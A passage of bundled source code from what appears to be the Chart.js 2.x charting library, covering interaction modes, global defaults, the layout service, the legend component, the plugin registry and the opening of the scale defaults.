function getIntersectItems(chart, position) {
var elements = [];
parseVisibleItems(chart, function (element) {
if (element.inRange(position.x, position.y)) {
elements.push(element);
}
});
return elements;
}
/**
* Helper function to get the items nearest to the event position considering all visible items in teh chart
* @param chart {Chart} the chart to look at elements from
* @param position {Point} the point to be nearest to
* @param intersect {Boolean} if true, only consider items that intersect the position
* @param distanceMetric {Function} Optional function to provide the distance between
* @return {ChartElement[]} the nearest items
*/
function getNearestItems(chart, position, intersect, distanceMetric) {
var minDistance = Number.POSITIVE_INFINITY;
var nearestItems = [];
if (!distanceMetric) {
distanceMetric = helpers.distanceBetweenPoints;
}
parseVisibleItems(chart, function (element) {
if (intersect && !element.inRange(position.x, position.y)) {
return;
}
var center = element.getCenterPoint();
var distance = distanceMetric(position, center);
if (distance < minDistance) {
nearestItems = [element];
minDistance = distance;
} else if (distance === minDistance) {
// Can have multiple items at the same distance in which case we sort by size
nearestItems.push(element);
}
});
return nearestItems;
}
function indexMode(chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var distanceMetric = function (pt1, pt2) {
return Math.abs(pt1.x - pt2.x);
};
var items = options.intersect ? getIntersectItems(chart, position) : getNearestItems(chart, position, false, distanceMetric);
var elements = [];
if (!items.length) {
return [];
}
chart.data.datasets.forEach(function (dataset, datasetIndex) {
if (chart.isDatasetVisible(datasetIndex)) {
var meta = chart.getDatasetMeta(datasetIndex),
element = meta.data[items[0]._index];
// don't count items that are skipped (null data)
if (element && !element._view.skip) {
elements.push(element);
}
}
});
return elements;
}
/**
* @interface IInteractionOptions
*/
/**
* If true, only consider items that intersect the point
* @name IInterfaceOptions#boolean
* @type Boolean
*/
/**
* @namespace Chart.Interaction
* Contains interaction related functions
*/
Chart.Interaction = {
// Helper function for different modes
modes: {
single: function (chart, e) {
var position = helpers.getRelativePosition(e, chart.chart);
var elements = [];
parseVisibleItems(chart, function (element) {
if (element.inRange(position.x, position.y)) {
elements.push(element);
return elements;
}
});
return elements.slice(0, 1);
},
/**
* @function Chart.Interaction.modes.label
* @deprecated since version 2.4.0
*/
label: indexMode,
/**
* Returns items at the same index. If the options.intersect parameter is true, we only return items if we intersect something
* If the options.intersect mode is false, we find the nearest item and return the items at the same index as that item
* @function Chart.Interaction.modes.index
* @since v2.4.0
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are find things at
* @param options {IInteractionOptions} options to use during interaction
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
index: indexMode,
/**
* Returns items in the same dataset. If the options.intersect parameter is true, we only return items if we intersect something
* If the options.intersect is false, we find the nearest item and return the items in that dataset
* @function Chart.Interaction.modes.dataset
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are find things at
* @param options {IInteractionOptions} options to use during interaction
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
dataset: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var items = options.intersect ? getIntersectItems(chart, position) : getNearestItems(chart, position, false);
if (items.length > 0) {
items = chart.getDatasetMeta(items[0]._datasetIndex).data;
}
return items;
},
/**
* @function Chart.Interaction.modes.x-axis
* @deprecated since version 2.4.0. Use index mode and intersect == true
*/
'x-axis': function (chart, e) {
return indexMode(chart, e, true);
},
/**
* Point mode returns all elements that hit test based on the event position
* of the event
* @function Chart.Interaction.modes.intersect
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are find things at
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
point: function (chart, e) {
var position = helpers.getRelativePosition(e, chart.chart);
return getIntersectItems(chart, position);
},
/**
* nearest mode returns the element closest to the point
* @function Chart.Interaction.modes.intersect
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are find things at
* @param options {IInteractionOptions} options to use
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
nearest: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var nearestItems = getNearestItems(chart, position, options.intersect);
// We have multiple items at the same distance from the event. Now sort by smallest
if (nearestItems.length > 1) {
nearestItems.sort(function (a, b) {
var sizeA = a.getArea();
var sizeB = b.getArea();
var ret = sizeA - sizeB;
if (ret === 0) {
// if equal sort by dataset index
ret = a._datasetIndex - b._datasetIndex;
}
return ret;
});
}
// Return only 1 item
return nearestItems.slice(0, 1);
},
/**
* x mode returns the elements that hit-test at the current x coordinate
* @function Chart.Interaction.modes.x
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are find things at
* @param options {IInteractionOptions} options to use
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
x: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var items = [];
var intersectsItem = false;
parseVisibleItems(chart, function (element) {
if (element.inXRange(position.x)) {
items.push(element);
}
if (element.inRange(position.x, position.y)) {
intersectsItem = true;
}
});
// If we want to trigger on an intersect and we don't have any items
// that intersect the position, return nothing
if (options.intersect && !intersectsItem) {
items = [];
}
return items;
},
/**
* y mode returns the elements that hit-test at the current y coordinate
* @function Chart.Interaction.modes.y
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are find things at
* @param options {IInteractionOptions} options to use
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
y: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var items = [];
var intersectsItem = false;
parseVisibleItems(chart, function (element) {
if (element.inYRange(position.y)) {
items.push(element);
}
if (element.inRange(position.x, position.y)) {
intersectsItem = true;
}
});
// If we want to trigger on an intersect and we don't have any items
// that intersect the position, return nothing
if (options.intersect && !intersectsItem) {
items = [];
}
return items;
}
}
};
};
}, {}], 28: [function (require, module, exports) {
'use strict';
module.exports = function () {
// Occupy the global variable of Chart, and create a simple base class
var Chart = function (item, config) {
this.controller = new Chart.Controller(item, config, this);
return this.controller;
};
// Globally expose the defaults to allow for user updating/changing
Chart.defaults = {
global: {
responsive: true,
responsiveAnimationDuration: 0,
maintainAspectRatio: true,
events: ['mousemove', 'mouseout', 'click', 'touchstart', 'touchmove'],
hover: {
onHover: null,
mode: 'nearest',
intersect: true,
animationDuration: 400
},
onClick: null,
defaultColor: 'rgba(0,0,0,0.1)',
defaultFontColor: '#666',
defaultFontFamily: "'Helvetica Neue', 'Helvetica', 'Arial', sans-serif",
defaultFontSize: 12,
defaultFontStyle: 'normal',
showLines: true,
// Element defaults defined in element extensions
elements: {},
// Legend callback string
legendCallback: function (chart) {
var text = [];
text.push('<ul class="' + chart.id + '-legend">');
for (var i = 0; i < chart.data.datasets.length; i++) {
text.push('<li><span style="background-color:' + chart.data.datasets[i].backgroundColor + '"></span>');
if (chart.data.datasets[i].label) {
text.push(chart.data.datasets[i].label);
}
text.push('</li>');
}
text.push('</ul>');
return text.join('');
}
}
};
Chart.Chart = Chart;
return Chart;
};
}, {}], 29: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
// The layout service is very self explanatory. It's responsible for the layout within a chart.
// Scales, Legends and Plugins all rely on the layout service and can easily register to be placed anywhere they need
// It is this service's responsibility of carrying out that layout.
Chart.layoutService = {
defaults: {},
// Register a box to a chartInstance. A box is simply a reference to an object that requires layout. eg. Scales, Legend, Plugins.
addBox: function (chartInstance, box) {
if (!chartInstance.boxes) {
chartInstance.boxes = [];
}
chartInstance.boxes.push(box);
},
removeBox: function (chartInstance, box) {
if (!chartInstance.boxes) {
return;
}
chartInstance.boxes.splice(chartInstance.boxes.indexOf(box), 1);
},
// The most important function
update: function (chartInstance, width, height) {
if (!chartInstance) {
return;
}
var layoutOptions = chartInstance.options.layout;
var padding = layoutOptions ? layoutOptions.padding : null;
var leftPadding = 0;
var rightPadding = 0;
var topPadding = 0;
var bottomPadding = 0;
if (!isNaN(padding)) {
// options.layout.padding is a number. assign to all
leftPadding = padding;
rightPadding = padding;
topPadding = padding;
bottomPadding = padding;
} else {
leftPadding = padding.left || 0;
rightPadding = padding.right || 0;
topPadding = padding.top || 0;
bottomPadding = padding.bottom || 0;
}
var leftBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'left';
});
var rightBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'right';
});
var topBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'top';
});
var bottomBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'bottom';
});
// Boxes that overlay the chartarea such as the radialLinear scale
var chartAreaBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'chartArea';
});
// Ensure that full width boxes are at the very top / bottom
topBoxes.sort(function (a, b) {
return (b.options.fullWidth ? 1 : 0) - (a.options.fullWidth ? 1 : 0);
});
bottomBoxes.sort(function (a, b) {
return (a.options.fullWidth ? 1 : 0) - (b.options.fullWidth ? 1 : 0);
});
// Essentially we now have any number of boxes on each of the 4 sides.
// Our canvas looks like the following.
// The areas L1 and L2 are the left axes. R1 is the right axis, T1 is the top axis and
// B1 is the bottom axis
// There are also 4 quadrant-like locations (left to right instead of clockwise) reserved for chart overlays
// These locations are single-box locations only, when trying to register a chartArea location that is already taken,
// an error will be thrown.
//
// |----------------------------------------------------|
// | T1 (Full Width) |
// |----------------------------------------------------|
// | | | T2 | |
// | |----|-------------------------------------|----|
// | | | C1 | | C2 | |
// | | |----| |----| |
// | | | | |
// | L1 | L2 | ChartArea (C0) | R1 |
// | | | | |
// | | |----| |----| |
// | | | C3 | | C4 | |
// | |----|-------------------------------------|----|
// | | | B1 | |
// |----------------------------------------------------|
// | B2 (Full Width) |
// |----------------------------------------------------|
//
// What we do to find the best sizing, we do the following
// 1. Determine the minimum size of the chart area.
// 2. Split the remaining width equally between each vertical axis
// 3. Split the remaining height equally between each horizontal axis
// 4. Give each layout the maximum size it can be. The layout will return it's minimum size
// 5. Adjust the sizes of each axis based on it's minimum reported size.
// 6. Refit each axis
// 7. Position each axis in the final location
// 8. Tell the chart the final location of the chart area
// 9. Tell any axes that overlay the chart area the positions of the chart area
// Step 1
var chartWidth = width - leftPadding - rightPadding;
var chartHeight = height - topPadding - bottomPadding;
var chartAreaWidth = chartWidth / 2; // min 50%
var chartAreaHeight = chartHeight / 2; // min 50%
// Step 2
var verticalBoxWidth = (width - chartAreaWidth) / (leftBoxes.length + rightBoxes.length);
// Step 3
var horizontalBoxHeight = (height - chartAreaHeight) / (topBoxes.length + bottomBoxes.length);
// Step 4
var maxChartAreaWidth = chartWidth;
var maxChartAreaHeight = chartHeight;
var minBoxSizes = [];
function getMinimumBoxSize(box) {
var minSize;
var isHorizontal = box.isHorizontal();
if (isHorizontal) {
minSize = box.update(box.options.fullWidth ? chartWidth : maxChartAreaWidth, horizontalBoxHeight);
maxChartAreaHeight -= minSize.height;
} else {
minSize = box.update(verticalBoxWidth, chartAreaHeight);
maxChartAreaWidth -= minSize.width;
}
minBoxSizes.push({
horizontal: isHorizontal,
minSize: minSize,
box: box
});
}
helpers.each(leftBoxes.concat(rightBoxes, topBoxes, bottomBoxes), getMinimumBoxSize);
// At this point, maxChartAreaHeight and maxChartAreaWidth are the size the chart area could
// be if the axes are drawn at their minimum sizes.
// Steps 5 & 6
var totalLeftBoxesWidth = leftPadding;
var totalRightBoxesWidth = rightPadding;
var totalTopBoxesHeight = topPadding;
var totalBottomBoxesHeight = bottomPadding;
// Function to fit a box
function fitBox(box) {
var minBoxSize = helpers.findNextWhere(minBoxSizes, function (minBox) {
return minBox.box === box;
});
if (minBoxSize) {
if (box.isHorizontal()) {
var scaleMargin = {
left: totalLeftBoxesWidth,
right: totalRightBoxesWidth,
top: 0,
bottom: 0
};
// Don't use min size here because of label rotation. When the labels are rotated, their rotation highly depends
// on the margin. Sometimes they need to increase in size slightly
box.update(box.options.fullWidth ? chartWidth : maxChartAreaWidth, chartHeight / 2, scaleMargin);
} else {
box.update(minBoxSize.minSize.width, maxChartAreaHeight);
}
}
}
// Update, and calculate the left and right margins for the horizontal boxes
helpers.each(leftBoxes.concat(rightBoxes), fitBox);
helpers.each(leftBoxes, function (box) {
totalLeftBoxesWidth += box.width;
});
helpers.each(rightBoxes, function (box) {
totalRightBoxesWidth += box.width;
});
// Set the Left and Right margins for the horizontal boxes
helpers.each(topBoxes.concat(bottomBoxes), fitBox);
// Figure out how much margin is on the top and bottom of the vertical boxes
helpers.each(topBoxes, function (box) {
totalTopBoxesHeight += box.height;
});
helpers.each(bottomBoxes, function (box) {
totalBottomBoxesHeight += box.height;
});
function finalFitVerticalBox(box) {
var minBoxSize = helpers.findNextWhere(minBoxSizes, function (minSize) {
return minSize.box === box;
});
var scaleMargin = {
left: 0,
right: 0,
top: totalTopBoxesHeight,
bottom: totalBottomBoxesHeight
};
if (minBoxSize) {
box.update(minBoxSize.minSize.width, maxChartAreaHeight, scaleMargin);
}
}
// Let the left layout know the final margin
helpers.each(leftBoxes.concat(rightBoxes), finalFitVerticalBox);
// Recalculate because the size of each layout might have changed slightly due to the margins (label rotation for instance)
totalLeftBoxesWidth = leftPadding;
totalRightBoxesWidth = rightPadding;
totalTopBoxesHeight = topPadding;
totalBottomBoxesHeight = bottomPadding;
helpers.each(leftBoxes, function (box) {
totalLeftBoxesWidth += box.width;
});
helpers.each(rightBoxes, function (box) {
totalRightBoxesWidth += box.width;
});
helpers.each(topBoxes, function (box) {
totalTopBoxesHeight += box.height;
});
helpers.each(bottomBoxes, function (box) {
totalBottomBoxesHeight += box.height;
});
// Figure out if our chart area changed. This would occur if the dataset layout label rotation
// changed due to the application of the margins in step 6. Since we can only get bigger, this is safe to do
// without calling `fit` again
var newMaxChartAreaHeight = height - totalTopBoxesHeight - totalBottomBoxesHeight;
var newMaxChartAreaWidth = width - totalLeftBoxesWidth - totalRightBoxesWidth;
if (newMaxChartAreaWidth !== maxChartAreaWidth || newMaxChartAreaHeight !== maxChartAreaHeight) {
helpers.each(leftBoxes, function (box) {
box.height = newMaxChartAreaHeight;
});
helpers.each(rightBoxes, function (box) {
box.height = newMaxChartAreaHeight;
});
helpers.each(topBoxes, function (box) {
if (!box.options.fullWidth) {
box.width = newMaxChartAreaWidth;
}
});
helpers.each(bottomBoxes, function (box) {
if (!box.options.fullWidth) {
box.width = newMaxChartAreaWidth;
}
});
maxChartAreaHeight = newMaxChartAreaHeight;
maxChartAreaWidth = newMaxChartAreaWidth;
}
// Step 7 - Position the boxes
var left = leftPadding;
var top = topPadding;
function placeBox(box) {
if (box.isHorizontal()) {
box.left = box.options.fullWidth ? leftPadding : totalLeftBoxesWidth;
box.right = box.options.fullWidth ? width - rightPadding : totalLeftBoxesWidth + maxChartAreaWidth;
box.top = top;
box.bottom = top + box.height;
// Move to next point
top = box.bottom;
} else {
box.left = left;
box.right = left + box.width;
box.top = totalTopBoxesHeight;
box.bottom = totalTopBoxesHeight + maxChartAreaHeight;
// Move to next point
left = box.right;
}
}
helpers.each(leftBoxes.concat(topBoxes), placeBox);
// Account for chart width and height
left += maxChartAreaWidth;
top += maxChartAreaHeight;
helpers.each(rightBoxes, placeBox);
helpers.each(bottomBoxes, placeBox);
// Step 8
chartInstance.chartArea = {
left: totalLeftBoxesWidth,
top: totalTopBoxesHeight,
right: totalLeftBoxesWidth + maxChartAreaWidth,
bottom: totalTopBoxesHeight + maxChartAreaHeight
};
// Step 9
helpers.each(chartAreaBoxes, function (box) {
box.left = chartInstance.chartArea.left;
box.top = chartInstance.chartArea.top;
box.right = chartInstance.chartArea.right;
box.bottom = chartInstance.chartArea.bottom;
box.update(maxChartAreaWidth, maxChartAreaHeight);
});
}
};
};
}, {}], 30: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var noop = helpers.noop;
Chart.defaults.global.legend = {
display: true,
position: 'top',
fullWidth: true, // marks that this box should take the full width of the canvas (pushing down other boxes)
reverse: false,
// a callback that will handle
onClick: function (e, legendItem) {
var index = legendItem.datasetIndex;
var ci = this.chart;
var meta = ci.getDatasetMeta(index);
// See controller.isDatasetVisible comment
meta.hidden = meta.hidden === null ? !ci.data.datasets[index].hidden : null;
// We hid a dataset ... rerender the chart
ci.update();
},
onHover: null,
labels: {
boxWidth: 40,
padding: 10,
// Generates labels shown in the legend
// Valid properties to return:
// text : text to display
// fillStyle : fill of coloured box
// strokeStyle: stroke of coloured box
// hidden : if this legend item refers to a hidden item
// lineCap : cap style for line
// lineDash
// lineDashOffset :
// lineJoin :
// lineWidth :
generateLabels: function (chart) {
var data = chart.data;
return helpers.isArray(data.datasets) ? data.datasets.map(function (dataset, i) {
return {
text: dataset.label,
fillStyle: (!helpers.isArray(dataset.backgroundColor) ? dataset.backgroundColor : dataset.backgroundColor[0]),
hidden: !chart.isDatasetVisible(i),
lineCap: dataset.borderCapStyle,
lineDash: dataset.borderDash,
lineDashOffset: dataset.borderDashOffset,
lineJoin: dataset.borderJoinStyle,
lineWidth: dataset.borderWidth,
strokeStyle: dataset.borderColor,
pointStyle: dataset.pointStyle,
// Below is extra data used for toggling the datasets
datasetIndex: i
};
}, this) : [];
}
}
};
/**
* Helper function to get the box width based on the usePointStyle option
* @param labelopts {Object} the label options on the legend
* @param fontSize {Number} the label font size
* @return {Number} width of the color box area
*/
function getBoxWidth(labelOpts, fontSize) {
return labelOpts.usePointStyle ?
fontSize * Math.SQRT2 :
labelOpts.boxWidth;
}
Chart.Legend = Chart.Element.extend({
initialize: function (config) {
helpers.extend(this, config);
// Contains hit boxes for each dataset (in dataset order)
this.legendHitBoxes = [];
// Are we in doughnut mode which has a different data type
this.doughnutMode = false;
},
// These methods are ordered by lifecycle. Utilities then follow.
// Any function defined here is inherited by all legend types.
// Any function can be extended by the legend type
beforeUpdate: noop,
update: function (maxWidth, maxHeight, margins) {
var me = this;
// Update Lifecycle - Probably don't want to ever extend or overwrite this function ;)
me.beforeUpdate();
// Absorb the master measurements
me.maxWidth = maxWidth;
me.maxHeight = maxHeight;
me.margins = margins;
// Dimensions
me.beforeSetDimensions();
me.setDimensions();
me.afterSetDimensions();
// Labels
me.beforeBuildLabels();
me.buildLabels();
me.afterBuildLabels();
// Fit
me.beforeFit();
me.fit();
me.afterFit();
//
me.afterUpdate();
return me.minSize;
},
afterUpdate: noop,
//
beforeSetDimensions: noop,
setDimensions: function () {
var me = this;
// Set the unconstrained dimension before label rotation
if (me.isHorizontal()) {
// Reset position before calculating rotation
me.width = me.maxWidth;
me.left = 0;
me.right = me.width;
} else {
me.height = me.maxHeight;
// Reset position before calculating rotation
me.top = 0;
me.bottom = me.height;
}
// Reset padding
me.paddingLeft = 0;
me.paddingTop = 0;
me.paddingRight = 0;
me.paddingBottom = 0;
// Reset minSize
me.minSize = {
width: 0,
height: 0
};
},
afterSetDimensions: noop,
//
beforeBuildLabels: noop,
buildLabels: function () {
var me = this;
me.legendItems = me.options.labels.generateLabels.call(me, me.chart);
if (me.options.reverse) {
me.legendItems.reverse();
}
},
afterBuildLabels: noop,
//
beforeFit: noop,
fit: function () {
var me = this;
var opts = me.options;
var labelOpts = opts.labels;
var display = opts.display;
var ctx = me.ctx;
var globalDefault = Chart.defaults.global,
itemOrDefault = helpers.getValueOrDefault,
fontSize = itemOrDefault(labelOpts.fontSize, globalDefault.defaultFontSize),
fontStyle = itemOrDefault(labelOpts.fontStyle, globalDefault.defaultFontStyle),
fontFamily = itemOrDefault(labelOpts.fontFamily, globalDefault.defaultFontFamily),
labelFont = helpers.fontString(fontSize, fontStyle, fontFamily);
// Reset hit boxes
var hitboxes = me.legendHitBoxes = [];
var minSize = me.minSize;
var isHorizontal = me.isHorizontal();
if (isHorizontal) {
minSize.width = me.maxWidth; // fill all the width
minSize.height = display ? 10 : 0;
} else {
minSize.width = display ? 10 : 0;
minSize.height = me.maxHeight; // fill all the height
}
// Increase sizes here
if (display) {
ctx.font = labelFont;
if (isHorizontal) {
// Labels
// Width of each line of legend boxes. Labels wrap onto multiple lines when there are too many to fit on one
var lineWidths = me.lineWidths = [0];
var totalHeight = me.legendItems.length ? fontSize + (labelOpts.padding) : 0;
ctx.textAlign = 'left';
ctx.textBaseline = 'top';
helpers.each(me.legendItems, function (legendItem, i) {
var boxWidth = getBoxWidth(labelOpts, fontSize);
var width = boxWidth + (fontSize / 2) + ctx.measureText(legendItem.text).width;
if (lineWidths[lineWidths.length - 1] + width + labelOpts.padding >= me.width) {
totalHeight += fontSize + (labelOpts.padding);
lineWidths[lineWidths.length] = me.left;
}
// Store the hitbox width and height here. Final position will be updated in `draw`
hitboxes[i] = {
left: 0,
top: 0,
width: width,
height: fontSize
};
lineWidths[lineWidths.length - 1] += width + labelOpts.padding;
});
minSize.height += totalHeight;
} else {
var vPadding = labelOpts.padding;
var columnWidths = me.columnWidths = [];
var totalWidth = labelOpts.padding;
var currentColWidth = 0;
var currentColHeight = 0;
var itemHeight = fontSize + vPadding;
helpers.each(me.legendItems, function (legendItem, i) {
var boxWidth = getBoxWidth(labelOpts, fontSize);
var itemWidth = boxWidth + (fontSize / 2) + ctx.measureText(legendItem.text).width;
// If too tall, go to new column
if (currentColHeight + itemHeight > minSize.height) {
totalWidth += currentColWidth + labelOpts.padding;
columnWidths.push(currentColWidth); // previous column width
currentColWidth = 0;
currentColHeight = 0;
}
// Get max width
currentColWidth = Math.max(currentColWidth, itemWidth);
currentColHeight += itemHeight;
// Store the hitbox width and height here. Final position will be updated in `draw`
hitboxes[i] = {
left: 0,
top: 0,
width: itemWidth,
height: fontSize
};
});
totalWidth += currentColWidth;
columnWidths.push(currentColWidth);
minSize.width += totalWidth;
}
}
me.width = minSize.width;
me.height = minSize.height;
},
afterFit: noop,
// Shared Methods
isHorizontal: function () {
return this.options.position === 'top' || this.options.position === 'bottom';
},
// Actually draw the legend on the canvas
draw: function () {
var me = this;
var opts = me.options;
var labelOpts = opts.labels;
var globalDefault = Chart.defaults.global,
lineDefault = globalDefault.elements.line,
legendWidth = me.width,
lineWidths = me.lineWidths;
if (opts.display) {
var ctx = me.ctx,
cursor,
itemOrDefault = helpers.getValueOrDefault,
fontColor = itemOrDefault(labelOpts.fontColor, globalDefault.defaultFontColor),
fontSize = itemOrDefault(labelOpts.fontSize, globalDefault.defaultFontSize),
fontStyle = itemOrDefault(labelOpts.fontStyle, globalDefault.defaultFontStyle),
fontFamily = itemOrDefault(labelOpts.fontFamily, globalDefault.defaultFontFamily),
labelFont = helpers.fontString(fontSize, fontStyle, fontFamily);
// Canvas setup
ctx.textAlign = 'left';
ctx.textBaseline = 'top';
ctx.lineWidth = 0.5;
ctx.strokeStyle = fontColor; // for strikethrough effect
ctx.fillStyle = fontColor; // render in correct colour
ctx.font = labelFont;
var boxWidth = getBoxWidth(labelOpts, fontSize),
hitboxes = me.legendHitBoxes;
// current position
var drawLegendBox = function (x, y, legendItem) {
if (isNaN(boxWidth) || boxWidth <= 0) {
return;
}
// Set the ctx for the box
ctx.save();
ctx.fillStyle = itemOrDefault(legendItem.fillStyle, globalDefault.defaultColor);
ctx.lineCap = itemOrDefault(legendItem.lineCap, lineDefault.borderCapStyle);
ctx.lineDashOffset = itemOrDefault(legendItem.lineDashOffset, lineDefault.borderDashOffset);
ctx.lineJoin = itemOrDefault(legendItem.lineJoin, lineDefault.borderJoinStyle);
ctx.lineWidth = itemOrDefault(legendItem.lineWidth, lineDefault.borderWidth);
ctx.strokeStyle = itemOrDefault(legendItem.strokeStyle, globalDefault.defaultColor);
var isLineWidthZero = (itemOrDefault(legendItem.lineWidth, lineDefault.borderWidth) === 0);
if (ctx.setLineDash) {
// IE 9 and 10 do not support line dash
ctx.setLineDash(itemOrDefault(legendItem.lineDash, lineDefault.borderDash));
}
if (opts.labels && opts.labels.usePointStyle) {
// Recalculate x and y for drawPoint() because its expecting
// x and y to be center of figure (instead of top left)
var radius = fontSize * Math.SQRT2 / 2;
var offSet = radius / Math.SQRT2;
var centerX = x + offSet;
var centerY = y + offSet;
// Draw pointStyle as legend symbol
Chart.canvasHelpers.drawPoint(ctx, legendItem.pointStyle, radius, centerX, centerY);
} else {
// Draw box as legend symbol
if (!isLineWidthZero) {
ctx.strokeRect(x, y, boxWidth, fontSize);
}
ctx.fillRect(x, y, boxWidth, fontSize);
}
ctx.restore();
};
var fillText = function (x, y, legendItem, textWidth) {
ctx.fillText(legendItem.text, boxWidth + (fontSize / 2) + x, y);
if (legendItem.hidden) {
// Strikethrough the text if hidden
ctx.beginPath();
ctx.lineWidth = 2;
ctx.moveTo(boxWidth + (fontSize / 2) + x, y + (fontSize / 2));
ctx.lineTo(boxWidth + (fontSize / 2) + x + textWidth, y + (fontSize / 2));
ctx.stroke();
}
};
// Horizontal
var isHorizontal = me.isHorizontal();
if (isHorizontal) {
cursor = {
x: me.left + ((legendWidth - lineWidths[0]) / 2),
y: me.top + labelOpts.padding,
line: 0
};
} else {
cursor = {
x: me.left + labelOpts.padding,
y: me.top + labelOpts.padding,
line: 0
};
}
var itemHeight = fontSize + labelOpts.padding;
helpers.each(me.legendItems, function (legendItem, i) {
var textWidth = ctx.measureText(legendItem.text).width,
width = boxWidth + (fontSize / 2) + textWidth,
x = cursor.x,
y = cursor.y;
if (isHorizontal) {
if (x + width >= legendWidth) {
y = cursor.y += itemHeight;
cursor.line++;
x = cursor.x = me.left + ((legendWidth - lineWidths[cursor.line]) / 2);
}
} else if (y + itemHeight > me.bottom) {
x = cursor.x = x + me.columnWidths[cursor.line] + labelOpts.padding;
y = cursor.y = me.top;
cursor.line++;
}
drawLegendBox(x, y, legendItem);
hitboxes[i].left = x;
hitboxes[i].top = y;
// Fill the actual label
fillText(x, y, legendItem, textWidth);
if (isHorizontal) {
cursor.x += width + (labelOpts.padding);
} else {
cursor.y += itemHeight;
}
});
}
},
/**
* Handle an event
* @private
* @param e {Event} the event to handle
* @return {Boolean} true if a change occured
*/
handleEvent: function (e) {
var me = this;
var opts = me.options;
var type = e.type === 'mouseup' ? 'click' : e.type;
var changed = false;
if (type === 'mousemove') {
if (!opts.onHover) {
return;
}
} else if (type === 'click') {
if (!opts.onClick) {
return;
}
} else {
return;
}
var position = helpers.getRelativePosition(e, me.chart.chart),
x = position.x,
y = position.y;
if (x >= me.left && x <= me.right && y >= me.top && y <= me.bottom) {
// See if we are touching one of the dataset boxes
var lh = me.legendHitBoxes;
for (var i = 0; i < lh.length; ++i) {
var hitBox = lh[i];
if (x >= hitBox.left && x <= hitBox.left + hitBox.width && y >= hitBox.top && y <= hitBox.top + hitBox.height) {
// Touching an element
if (type === 'click') {
opts.onClick.call(me, e, me.legendItems[i]);
changed = true;
break;
} else if (type === 'mousemove') {
opts.onHover.call(me, e, me.legendItems[i]);
changed = true;
break;
}
}
}
}
return changed;
}
});
// Register the legend plugin
Chart.plugins.register({
beforeInit: function (chartInstance) {
var opts = chartInstance.options;
var legendOpts = opts.legend;
if (legendOpts) {
chartInstance.legend = new Chart.Legend({
ctx: chartInstance.chart.ctx,
options: legendOpts,
chart: chartInstance
});
Chart.layoutService.addBox(chartInstance, chartInstance.legend);
}
}
});
};
}, {}], 31: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var noop = Chart.helpers.noop;
/**
* The plugin service singleton
* @namespace Chart.plugins
* @since 2.1.0
*/
Chart.plugins = {
_plugins: [],
/**
* Registers the given plugin(s) if not already registered.
* @param {Array|Object} plugins plugin instance(s).
*/
register: function (plugins) {
var p = this._plugins;
([]).concat(plugins).forEach(function (plugin) {
if (p.indexOf(plugin) === -1) {
p.push(plugin);
}
});
},
/**
* Unregisters the given plugin(s) only if registered.
* @param {Array|Object} plugins plugin instance(s).
*/
unregister: function (plugins) {
var p = this._plugins;
([]).concat(plugins).forEach(function (plugin) {
var idx = p.indexOf(plugin);
if (idx !== -1) {
p.splice(idx, 1);
}
});
},
/**
* Remove all registered plugins.
* @since 2.1.5
*/
clear: function () {
this._plugins = [];
},
/**
* Returns the number of registered plugins?
* @returns {Number}
* @since 2.1.5
*/
count: function () {
return this._plugins.length;
},
/**
* Returns all registered plugin instances.
* @returns {Array} array of plugin objects.
* @since 2.1.5
*/
getAll: function () {
return this._plugins;
},
/**
* Calls registered plugins on the specified extension, with the given args. This
* method immediately returns as soon as a plugin explicitly returns false. The
* returned value can be used, for instance, to interrupt the current action.
* @param {String} extension the name of the plugin method to call (e.g. 'beforeUpdate').
* @param {Array} [args] extra arguments to apply to the extension call.
* @returns {Boolean} false if any of the plugins return false, else returns true.
*/
notify: function (extension, args) {
var plugins = this._plugins;
var ilen = plugins.length;
var i, plugin;
for (i = 0; i < ilen; ++i) {
plugin = plugins[i];
if (typeof plugin[extension] === 'function') {
if (plugin[extension].apply(plugin, args || []) === false) {
return false;
}
}
}
return true;
}
};
/**
* Plugin extension methods.
* @interface Chart.PluginBase
* @since 2.1.0
*/
Chart.PluginBase = Chart.Element.extend({
// Called at start of chart init
beforeInit: noop,
// Called at end of chart init
afterInit: noop,
// Called at start of update
beforeUpdate: noop,
// Called at end of update
afterUpdate: noop,
// Called at start of draw
beforeDraw: noop,
// Called at end of draw
afterDraw: noop,
// Called during destroy
destroy: noop
});
/**
* Provided for backward compatibility, use Chart.plugins instead
* @namespace Chart.pluginService
* @deprecated since version 2.1.5
* @todo remove me at version 3
*/
Chart.pluginService = Chart.plugins;
};
}, {}], 32: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.scale = {
display: true,
position: 'left',
// grid line settings
gridLines: {
display: true,
color: 'rgba(0, 0, 0, 0.1)',
lineWidth: 1,
drawBorder: true,
drawOnChartArea: true,
drawTicks: true,
tickMarkLength: 10,
zeroLineWidth: 1,
zeroLineColor: 'rgba(0,0,0,0.25)',
offsetGridLines: false,
borderDash: [],
borderDashOffset: 0.0
},
// scale label
scaleLabel: {
// actual label
labelString: '',
// display property
display: false
},
